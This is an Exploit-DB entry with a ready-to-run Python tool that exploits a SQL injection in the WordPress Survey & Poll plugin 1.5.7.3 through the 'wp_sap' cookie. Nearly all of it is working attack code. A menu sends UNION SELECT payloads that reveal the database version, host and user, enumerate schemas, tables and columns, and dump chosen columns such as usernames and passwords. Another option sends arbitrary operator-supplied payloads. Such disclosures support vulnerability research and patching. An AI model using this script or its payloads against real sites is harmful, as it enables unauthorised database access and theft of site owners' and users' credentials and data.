WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)

EDB-ID:

50269

CVE:

N/A




Platform:

PHP

Date:

2021-09-07


# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB,MYSQL

#!/usr/bin/python3

import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators

#Install all the requirements

"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators

"""


parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u',help='Poll & Survey page URL')
args = parser.parse_args()

url = args.u


if len(sys.argv) !=3:
    parser.print_help(sys.stderr)
    sys.exit()

if not validators.url(url):
	print(colored("\r\nEnter URL with http:// or https://\r\n",'red'))
	parser.print_help(sys.stderr)
	sys.exit()


def currect_db_name():
	payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]"""
	inject(payload)


def db_version():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]"""
	inject(payload)


def hostname():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]"""
	inject(payload)


def current_user():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]"""
	inject(payload)


def list_databases():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]"""
	inject(payload)

def list_tables_db():
	db = input("\r\nDatabase : ")
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db)
	inject(payload)	


def list_columns_db():
	db = input("\r\nDatabase : ")
	table = input("Table : ")
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table)
	inject(payload)	


def dump_db():
	db = input("\r\nDatabase: ")
	table = input("Table: ")
	column = input("Columns Eg: users,password : ")
	dump = "%s.%s" %(db,table)
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table)
	inject(payload)	


def custom_payload():
	payload = input("\r\nPayload : ")
	inject(payload)

def inject(inject_payload):

	request = requests.Session()

	cookies = {
		    'wp_sap': inject_payload,
		    
		}
	print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green'))
	response = request.get(url,cookies=cookies)
	warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
	soup = BeautifulSoup(response.text,features="lxml")
	cdata = soup.find(text=re.compile("CDATA"))
	split_cdata = list(cdata.split(':'))
	output = split_cdata[11]
	print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green'))
	time.sleep(1)
	main()



def main():
	print ("Automated SQL Injector (wp-survey-and-poll)")
	print ("Enter the respective number to select option")
	print ("#EXAMPLE Option : 1\r\n")



	print("Option 1 : Grab Database Version")
	print("Option 2 : Get Current Database Name")
	print("Option 3 : Get Hostname ")
	print("Option 4 : Get Current User")
	print("Option 5 : List All Databases")
	print("Option 6 : List Tables From Database")
	print("Option 7 : List Columns from Tables")
	print("Option 8 : Dump Database")
	print("Option 9 : Custom Payload")
	print("Option 10 : Exit")


	print("\r\n")
	option_selected = str(input("Select Option : "))


	if(option_selected=="1"):
		db_version()

	if(option_selected=="2"):
		currect_db_name()

	if(option_selected=="3"):
		hostname()

	if(option_selected=="4"):
		current_user()

	if(option_selected=="5"):
		list_databases()

	if(option_selected=="6"):
		list_tables_db()

	if(option_selected=="7"):
		list_columns_db()

	if(option_selected=="8"):
		dump_db()

	if(option_selected=="9"):
		custom_payload()

	if(option_selected=="10"):
		sys.exit()
	
	else:
		main()

main()